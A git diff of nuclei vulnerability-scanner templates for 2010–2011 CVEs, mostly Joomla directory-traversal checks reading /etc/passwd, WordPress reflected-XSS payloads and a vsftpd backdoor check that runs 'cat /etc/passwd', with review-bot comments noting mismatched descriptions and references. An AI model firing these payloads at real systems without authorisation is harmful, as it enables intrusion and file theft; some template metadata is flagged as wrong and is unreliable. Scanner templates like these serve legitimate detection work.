@@ -0,0 +1,27 @@ +id: CVE-2010-1302 + +info: + name: Joomla! Component DW Graph - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11978 + - https://www.cvedetails.com/cve/CVE-2010-1302 + tags: cve,cve2010,joomla,lfi,graph + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1352.yaml b/nuclei-templates/CVE-2010/cve-2010-1352.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1352.yaml rename to nuclei-templates/CVE-2010/cve-2010-1352.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1353.yaml b/nuclei-templates/CVE-2010/cve-2010-1353.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1353.yaml rename to nuclei-templates/CVE-2010/cve-2010-1353.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1354.yaml b/nuclei-templates/CVE-2010/cve-2010-1354.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1354.yaml rename to nuclei-templates/CVE-2010/cve-2010-1354.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1472.yaml b/nuclei-templates/CVE-2010/cve-2010-1472.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1472.yaml rename to nuclei-templates/CVE-2010/cve-2010-1472.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1473.yaml b/nuclei-templates/CVE-2010/cve-2010-1473.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1473.yaml rename to nuclei-templates/CVE-2010/cve-2010-1473.yaml 
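Review bot: The traversal here is only eight levels deep (`controller=../../../../../../../../etc/passwd%00`) whereas the sibling templates added in this commit use 10–15; overshooting is harmless because `..` at `/` is a no-op, while undershooting misses installs whose docroot is nested deeper, so use a depth comparable to the siblings. The `graph` entry in `tags` is not a product or vulnerability-class tag like the rest of the list (`cve,cve2010,joomla,lfi`); either drop it or use the component name `dwgraphs` so it is searchable.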
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1491.yaml b/nuclei-templates/CVE-2010/cve-2010-1491.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1491.yaml rename to nuclei-templates/CVE-2010/cve-2010-1491.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1531.yaml b/nuclei-templates/CVE-2010/cve-2010-1531.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1531.yaml rename to nuclei-templates/CVE-2010/cve-2010-1531.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1532.yaml b/nuclei-templates/CVE-2010/cve-2010-1532.yaml new file mode 100644 index 0000000000..594664996b --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1532.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1532 + +info: + name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12118 + - https://www.cvedetails.com/cve/CVE-2010-1532 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1601.yaml b/nuclei-templates/CVE-2010/cve-2010-1601.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1601.yaml rename to nuclei-templates/CVE-2010/cve-2010-1601.yaml 
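Review bot: The new cve-2010-1532.yaml carries no `classification`/`cve-id` and no `remediation`, while the description pins the affected version ("component 1.5.3") and the deleted uppercase templates elsewhere in this commit all had at least `classification: cve-id: ...` and a remediation line. Carry that over so the template is consistent with the rest of the tree, e.g. `classification:` with `cve-id: CVE-2010-1532` and `remediation: Upgrade to a supported version of the PowerMail Pro component.` The `%00` terminator and the unanchored `"root:.*:0:0"` regex share the caveats of the other Joomla LFI templates in this batch.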
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1657.yaml b/nuclei-templates/CVE-2010/cve-2010-1657.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1657.yaml rename to nuclei-templates/CVE-2010/cve-2010-1657.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1718.yaml b/nuclei-templates/CVE-2010/cve-2010-1718.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1718.yaml rename to nuclei-templates/CVE-2010/cve-2010-1718.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1723.yaml b/nuclei-templates/CVE-2010/cve-2010-1723.yaml new file mode 100644 index 0000000000..4b5060444b --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1723.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1723 + +info: + name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12289 + - https://www.cvedetails.com/cve/CVE-2010-1723 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1979.yaml b/nuclei-templates/CVE-2010/cve-2010-1979.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1979.yaml rename to nuclei-templates/CVE-2010/cve-2010-1979.yaml 
diff --git a/nuclei-templates/CVE-2010/CVE-2010-2036.yaml b/nuclei-templates/CVE-2010/cve-2010-2036.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-2036.yaml rename to nuclei-templates/CVE-2010/cve-2010-2036.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-2050.yaml b/nuclei-templates/CVE-2010/cve-2010-2050.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-2050.yaml rename to nuclei-templates/CVE-2010/cve-2010-2050.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-2128.yaml b/nuclei-templates/CVE-2010/cve-2010-2128.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-2128.yaml rename to nuclei-templates/CVE-2010/cve-2010-2128.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-2259.yaml b/nuclei-templates/CVE-2010/cve-2010-2259.yaml new file mode 100644 index 0000000000..0d38e58882 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2259.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2259 + +info: + name: Joomla! Component com_bfsurvey - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/10946 + - https://www.cvedetails.com/cve/CVE-2010-2259 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2857.yaml b/nuclei-templates/CVE-2010/cve-2010-2857.yaml new file mode 100644 index 0000000000..1478adabab --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2857.yaml 
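Review bot: This adds `cve-2010-2259.yaml` while an earlier hunk in the same commit deletes `CVE-2010-2259.yaml` with the same `id: CVE-2010-2259`; on a case-insensitive checkout (macOS, Windows) the two paths name the same file, and the commit also flips other files in the opposite direction (`cve-2010-2307.yaml` to `CVE-2010-2307.yaml`), so the tree has no stable casing convention. The new copy is also the poorer one: it drops `classification`/`cve-id`, `remediation` and two advisory references the deleted file had. Pick one canonical casing repo-wide and carry the metadata over, e.g. `classification:` with `cve-id: CVE-2010-2259`.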
@@ -0,0 +1,27 @@ +id: CVE-2010-2857 + +info: + name: Joomla! Component Music Manager - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html. + reference: | + - https://www.exploit-db.com/exploits/14274 + - https://www.cvedetails.com/cve/CVE-2010-2857 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2918.yaml b/nuclei-templates/CVE-2010/cve-2010-2918.yaml new file mode 100644 index 0000000000..b8ddd64eb5 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2918.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2918 + +info: + name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion + author: daffainfo + severity: high + description: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. + reference: + - https://www.exploit-db.com/exploits/31708 + - https://www.cvedetails.com/cve/CVE-2010-2918 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file 
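Review bot: `reference: |` makes the two URLs beneath it a single literal block-scalar string rather than a YAML list, so `- https://www.exploit-db.com/exploits/14274` becomes literal text including the dash; every other template added in this commit uses a bare `reference:` followed by the list, so drop the `|`. The rest of the file follows the batch pattern (`%00` truncation, `"root:.*:0:0"` without the trailing colon, no `classification` block) and shares the same caveats.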
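Review bot: cve-2010-2918.yaml is tagged `lfi` and probes with a local traversal (`mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd`), while its name and description call this a remote file inclusion via a URL in that parameter. Using a local path is a reasonable proxy because an unfiltered include of the parameter also accepts a relative path, but the tags should reflect the CVE (add `rfi` next to `lfi`) and a comment such as `# probes the include with a local path; a miss does not rule out remote inclusion` would stop a negative result being over-read. The description says arbitrary PHP code execution, so `severity: high` is arguably low, but that matches the deleted uppercase copy and is a judgement call.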
diff --git a/nuclei-templates/CVE-2010/CVE-2010-3203.yaml b/nuclei-templates/CVE-2010/cve-2010-3203.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-3203.yaml rename to nuclei-templates/CVE-2010/cve-2010-3203.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-4239.yaml b/nuclei-templates/CVE-2010/cve-2010-4239.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-4239.yaml rename to nuclei-templates/CVE-2010/cve-2010-4239.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-4977.yaml b/nuclei-templates/CVE-2010/cve-2010-4977.yaml new file mode 100644 index 0000000000..eb135d7ccc --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-4977.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-4977 + +info: + name: Joomla! Component Canteen 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34250 + - https://www.cvedetails.com/cve/CVE-2010-4977 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2011/CVE-2011-0049.yaml b/nuclei-templates/CVE-2011/CVE-2011-0049.yaml deleted file mode 100644 index 2610cba7eb..0000000000 --- a/nuclei-templates/CVE-2011/CVE-2011-0049.yaml +++ /dev/null 
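Review bot: In cve-2010-4977.yaml the description describes a SQL injection in menu.php via the `mealid` parameter, while the request and matcher test a directory traversal in `controller` (`controller=../../../../../etc/passwd%00` matched against `"root:.*:0:0"`); the template and its description cannot both be right about which bug this is, and the name ("Local File Inclusion") sides with the probe. Either the check should exercise the described SQLi or the description should describe the traversal the probe sends, and the CVE-to-template mapping should be re-verified before this ships under this id. The dropped reference to the "joomlacanteen-lfisql" advisory from the deleted copy was the one pointer that explained the overlap.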
@@ -1,30 +0,0 @@ -id: CVE-2011-0049 -info: - name: Majordomo2 - SMTP/HTTP Directory Traversal - author: pikpikcu - severity: high - description: A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface. - reference: - - https://www.exploit-db.com/exploits/16103 - - https://nvd.nist.gov/vuln/detail/CVE-2011-0063 - - http://www.kb.cert.org/vuls/id/363726 - - https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2011-0049 - tags: cve,cve2011,majordomo2,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2011/cve-2011-1669.yaml b/nuclei-templates/CVE-2011/CVE-2011-1669.yaml similarity index 100% rename from nuclei-templates/CVE-2011/cve-2011-1669.yaml rename to nuclei-templates/CVE-2011/CVE-2011-1669.yaml diff --git a/nuclei-templates/CVE-2011/CVE-2011-2523.yaml b/nuclei-templates/CVE-2011/CVE-2011-2523.yaml index 4e5159ea65..2991dbe5a7 100644 --- a/nuclei-templates/CVE-2011/CVE-2011-2523.yaml +++ b/nuclei-templates/CVE-2011/CVE-2011-2523.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the FTP server. remediation: | Update to the latest version of VSFTPD, which does not contain the backdoor. reference: @@ -27,7 +29,7 @@ info: vendor: vsftpd_project product: vsftpd shodan-query: product:"vsftpd" - tags: cve,cve2011,network,vsftpd,ftp,backdoor + tags: cve2011,network,cve,vsftpd,ftp,backdoor,vsftpd_project variables: cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs tcp: @@ -48,3 +50,4 @@ tcp: part: raw regex: - "root:.*:0:0:" +# digest: 4b0a00483046022100e91175cf5530607c72f21d98cc11af232b725a8b9568cb77a38e3bdbb40bcbac022100c3dc0038065f8cb4fab32e93610505a54456629241fa5ae3d32caa620a126772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2011/CVE-2011-4336.yaml b/nuclei-templates/CVE-2011/CVE-2011-4336.yaml deleted file mode 100644 index a9e81fe109..0000000000 --- a/nuclei-templates/CVE-2011/CVE-2011-4336.yaml +++ /dev/null 
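Review bot: The added `impact` says commands run "with the privileges of the FTP server", but the description on the context line two lines above says the backdoor gives root-level access; the two statements disagree, and the weaker one is what an operator will paste into a report. Align it with the description, e.g. `impact: | An unauthenticated remote attacker gets a command shell on the host; per the description this is root-level access.` The `cmd: "cat /etc/passwd"` variable on the context line means this template executes a command through the backdoor rather than just matching a banner, so a one-line comment flagging it as an active exploitation check would help anyone running it against production.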
@@ -1,41 +0,0 @@ -id: CVE-2011-4336 - -info: - name: Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting - author: pikpikcu - severity: medium - description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - - http://web.archive.org/web/20210328232945/https://www.securityfocus.com/bid/48806/info - - https://seclists.org/bugtraq/2011/Nov/140 - remediation: Upgrade to a supported version. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2011-4336 - cwe-id: CWE-79 - tags: cve,cve2011,xss,tikiwiki - -requests: - - method: GET - path: - - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html - -# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2011/CVE-2011-4624.yaml b/nuclei-templates/CVE-2011/CVE-2011-4624.yaml index d172e1768a..2ae32f0d66 100644 --- a/nuclei-templates/CVE-2011/CVE-2011-4624.yaml +++ b/nuclei-templates/CVE-2011/CVE-2011-4624.yaml 
@@ -1,24 +1,30 @@ id: CVE-2011-4624 + info: name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624 tags: cve,cve2011,wordpress,xss,wp-plugin + requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word words: - - "" + - "" part: body + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2011/CVE-2011-4926.yaml b/nuclei-templates/CVE-2011/CVE-2011-4926.yaml deleted file mode 100644 index cec37d272f..0000000000 --- a/nuclei-templates/CVE-2011/CVE-2011-4926.yaml +++ /dev/null 
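Review bot: The rewritten word matcher shows as `""` on both sides of this hunk; if the file really holds an empty string there, `type: word` matches every body and the template degenerates to "any 200 text/html response", which would flag every site it touches. The new payload reflects `</script><script>alert(document.domain)</script>`, so the entry must be that decoded string, e.g. `- "<script>alert(document.domain)</script>"`. If the value was only stripped by the page rendering, disregard this; the added description is accurate against the name.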
@@ -1,33 +0,0 @@ -id: CVE-2011-4926 -info: - name: Adminimize 1.7.22 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2011-4926 - - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926 - - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5 - - http://www.openwall.com/lists/oss-security/2012/01/10/9 - classification: - cve-id: CVE-2011-4926 - tags: cve,cve2011,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2011/cve-2011-5107.yaml b/nuclei-templates/CVE-2011/CVE-2011-5107.yaml similarity index 100% rename from nuclei-templates/CVE-2011/cve-2011-5107.yaml rename to nuclei-templates/CVE-2011/CVE-2011-5107.yaml diff --git a/nuclei-templates/CVE-2011/cve-2011-5179.yaml b/nuclei-templates/CVE-2011/CVE-2011-5179.yaml similarity index 100% rename from nuclei-templates/CVE-2011/cve-2011-5179.yaml rename to nuclei-templates/CVE-2011/CVE-2011-5179.yaml diff --git a/nuclei-templates/CVE-2011/CVE-2011-5181.yaml b/nuclei-templates/CVE-2011/CVE-2011-5181.yaml deleted file mode 100644 index dc2943fa8d..0000000000 --- a/nuclei-templates/CVE-2011/CVE-2011-5181.yaml +++ /dev/null 
@@ -1,34 +0,0 @@ -id: CVE-2011-5181 - -info: - name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 - tags: cve,cve2011,wordpress,xss,wp-plugin - classification: - cve-id: CVE-2011-5181 - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2011/CVE-2011-5252.yaml b/nuclei-templates/CVE-2011/CVE-2011-5252.yaml index e6242ec0da..50d55fd1ce 100644 --- a/nuclei-templates/CVE-2011/CVE-2011-5252.yaml +++ b/nuclei-templates/CVE-2011/CVE-2011-5252.yaml 
@@ -6,20 +6,29 @@ info: severity: medium description: | Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter. + impact: | + An attacker can craft a malicious URL to redirect users to a malicious website, leading to phishing attacks. + remediation: | + Validate and sanitize user input for the 'ReturnUrl' parameter to prevent open redirect vulnerabilities. reference: - https://www.exploit-db.com/exploits/36493 - https://nvd.nist.gov/vuln/detail/CVE-2011-5252 - https://www.invicti.com/web-applications-advisories/open-redirection-vulnerability-in-orchard/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/72110 + - http://orchard.codeplex.com/discussions/283667 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2011-5252 cwe-id: CWE-20 + epss-score: 0.02536 + epss-percentile: 0.89931 cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 - tags: cve,cve2011,redirect,orchard + vendor: orchardproject + product: orchard + tags: cve,cve2011,redirect,orchard,orchardproject http: - method: GET @@ -31,3 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' +# digest: 4a0a0047304502200b2fd44a350bfac8b9bac4f7f86aeb7a8019759723bee2617c7e051c86595fff022100dcf8de39a664b6126476f780592008d1e2b96bd8c83db51134cc0d55ceac2719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2011/cve-2011-5265.yaml b/nuclei-templates/CVE-2011/CVE-2011-5265.yaml similarity index 100% rename from nuclei-templates/CVE-2011/cve-2011-5265.yaml rename to nuclei-templates/CVE-2011/CVE-2011-5265.yaml 
diff --git a/nuclei-templates/CVE-2011/cve-2011-0049.yaml b/nuclei-templates/CVE-2011/cve-2011-0049.yaml new file mode 100644 index 0000000000..f916e1470c --- /dev/null +++ b/nuclei-templates/CVE-2011/cve-2011-0049.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-0049 + +info: + name: Majordomo2 - SMTP/HTTP Directory Traversal + author: pikpikcu + severity: high + description: Directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface. + reference: + - https://www.exploit-db.com/exploits/16103 + - https://nvd.nist.gov/vuln/detail/CVE-2011-0063 + - http://www.kb.cert.org/vuls/id/363726 + tags: cve,cve2011,majordomo2,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2011/cve-2011-4336.yaml b/nuclei-templates/CVE-2011/cve-2011-4336.yaml new file mode 100644 index 0000000000..1fe124e5d4 --- /dev/null +++ b/nuclei-templates/CVE-2011/cve-2011-4336.yaml 
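Review bot: The reference `https://nvd.nist.gov/vuln/detail/CVE-2011-0063` does not match the template's `id: CVE-2011-0049`; the id and the description agree on the Majordomo 2 traversal, so the NVD link is likely the wrong one and should be corrected before the template is published. The file is also added under the lowercase name cve-2011-0049.yaml while this same commit renames other templates to the uppercase CVE-YYYY-NNNN form; one convention should be used. `condition: and` on the single-entry regex matcher is a no-op and can be dropped.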
@@ -0,0 +1,38 @@ +id: CVE-2011-4336 + +info: + name: Tiki Wiki CMS Groupware 7.0 has XSS + author: pikpikcu + severity: medium + description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 + - https://www.securityfocus.com/bid/48806/info + - https://seclists.org/bugtraq/2011/Nov/140 + tags: cve,cve2011,xss,tikiwiki + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2011-4336 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2011/cve-2011-4926.yaml b/nuclei-templates/CVE-2011/cve-2011-4926.yaml new file mode 100644 index 0000000000..bbefdb8002 --- /dev/null +++ b/nuclei-templates/CVE-2011/cve-2011-4926.yaml @@ -0,0 +1,30 @@ +id: CVE-2011-4926 + +info: + name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 
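Review bot: The `classification:` block with `cve-id: CVE-2011-4926` and three of the four reference lines present in the CVE-2011-4926.yaml deleted at the top of this chunk are missing from this lowercase re-add, so the commit loses metadata instead of renaming the file; the same delete-then-re-add pattern appears for cve-2011-5181, cve-2012-0991, cve-2012-4768 and cve-2012-4940 later in the chunk, and it conflicts with the renames elsewhere in the commit that move files to the uppercase form. Keep one copy per CVE and restore the dropped `classification:` and `reference:` lines. As shown here the body matcher's word is the empty string `""` (and `''` in the cve-2011-4336 hunk on this same line), which may be an extraction artifact; if the word really is empty, it matches every body and the template reduces to a text/html plus 200 check, so the word should be the specific reflected string the template expects.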
